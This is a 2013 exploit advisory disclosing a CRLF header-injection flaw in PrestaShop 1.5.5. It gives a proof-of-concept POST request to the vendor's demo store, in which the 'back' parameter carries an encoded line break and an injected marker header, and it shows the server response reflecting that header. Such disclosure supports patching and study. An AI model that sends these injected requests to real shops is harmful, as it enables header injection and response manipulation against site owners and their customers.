############################################################## #Exploit Title: Prestashop v1.5.5 - CRLF Injection Vulnerability #Official site: http://www.prestashop.com #Official Demo : http://demo-store.prestashop.com/ #Risk Level: Medium #Exploit Author: Esac #Homepage author : www.iss4m.ma #Email author : s3cpr0@hotmail.fr #Last Checked: 06/09/2013 ############################################################# +----------+ | OVERVIEW | +----------+ PrestaShop is the most reliable and flexible Open-source e-commerce software. Since 2007,PrestaShop has revolutionized the industry by providing features that engage shoppers and increase online sales. The Prestateam consists of over 100 passionate individuals and more than 350,000 community members dedicated to innovated technology. It has more than 2.000.000 downloads and won the best open-source e-commerce software in the last few years. When installing and analyzing PrestaShop on a secure environment I discovered that it's vulnerable for CRLF injection vulnerability that may allow an attacker to include extra HTTP headers when viewing web pages. If Prestashop is called from the command line, carriage return and line feed (CRLF) characters may be included in the specified URL. These characters are not escaped when the input is used to construct a HTTP request.   Exploitation of this flaw may allow an attacker to inject additional HTTP headers into a request. Abuse of the 'Host' header may cause the request to be served as if made to a different domain, possibly providing the attacker with more control over the content returned.   This vulnerability has been reported for Prestashop v1.5.5 and may be other versions are affected. +---------------------------------------------------------------------------------------+ HTTP Headers Request : POST /fr/adresse HTTP/1.1 Content-Length: 389 Content-Type: application/x-www-form-urlencoded Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZGtZ3A7mQpE2jo2VD0mzY3wtqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgGGr4hYKm51D3wGkqO0lLNZowKzQVgJqWqSLngur8z4I%3D000404 Host: demo-store.prestashop.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept: */* address1=3137%20Laguna%20Street&address2=3137%20Laguna%20Street&alias=1&back=%0D%0A%20ZSL%2DCustom%2DHeader%3Alove_injection&city=San%20Francisco&company=Acunetix&dni=1&firstname=tdupumgx&id_country=231&id_state=&lastname=carbrbbm&other=1&phone=555-666-0606&phone_mobile=555-666-0606&postcode=94102&select_address=1&submitAddress=Valider&token=fa85a76b06b6cd05245288ea8006175a&vat_number=1 HTTP Headers Response : HTTP/1.1 302 Found Date: Wed, 28 Aug 2013 10:28:39 GMT Server: Apache Set-Cookie: 8812c36aa5ae336c2a77bf63211d899a=rxc6j6QPVlrzbhxxTrmza5dULYmyAKDhJ0WCO6VbDZG1%2BptPMOxtxYYBfzPV0v8ktqIllwzMGZBW7L0qZdiAlcqODbY7WKgoRufq%2FD7sY1qWm9tfzSi%2Bbp5Kq1iZcqteC%2B%2B2PgcezzDqkYvkLpZmoruDESRNupRzovjCTk6tYo%2FnZ1XSPqG6ppkQ4JDwpkC%2FKJICffmBAL4wdyQLMaPpI28zLcNO5RllSKt1Cr7UAU%2FWjh5WE2c%2B9eEYggZz%2F8h2f27ZFWqk38a5w0XlcaowDcYqoKAukCtfAaRUf0jmu9%2F9VXGhEhHBfdzowcl8N3l7EnMeOt9Lz4%2BIHOFAIte%2Fl4IcACiACBve7upfqOhpO6yyvF%2FpVlP%2FshYn049ymXIPjxD%2FHkE1HdVRsID5gETojPq0vjvbOeVorChNVV6zNpc%2FyFXS7BTDuF7OJyGZ8MWF5WPAYXwwa7MJ%2BqpeN9pv9c6s18SV5LhAB%2Bz7dA3%2BYZz4vE%2BAFoczry8Vh0ijOICgq4zKl3PuSt10RxAAYjxEcdQEEu5W1AjY6PXJwUz1e34%3D000404; expires=Tue, 17-Sep-2013 10:28:39 GMT; path=/; domain=demo-store.prestashop.com; httponly Location: http://demo-store.prestashop.com/fr/ ZSL-Custom-Header:love_injection Vary: Accept-Encoding Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=utf-8 +----------------------------------------------------------------------------------------+ Knowledge is not an Object , it's a flaw :) Greetz : White Tarbouch TEAM - Cobra WwW.Iss4m.Ma ./Issam IEBOUBEN Aka Esac